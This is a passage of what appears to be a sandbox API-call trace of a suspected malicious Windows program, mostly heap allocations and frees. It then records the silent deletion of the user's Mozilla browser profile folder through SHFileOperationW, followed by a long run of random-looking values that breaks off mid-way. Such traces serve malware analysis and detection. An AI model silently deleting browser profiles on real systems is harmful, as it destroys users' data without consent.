lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0204.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0204.484] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Mozilla", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", lpFilePart=0x8bf658*="Mozilla") returned 0x35 [0204.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0204.484] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla")) returned 0x2010 [0204.484] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd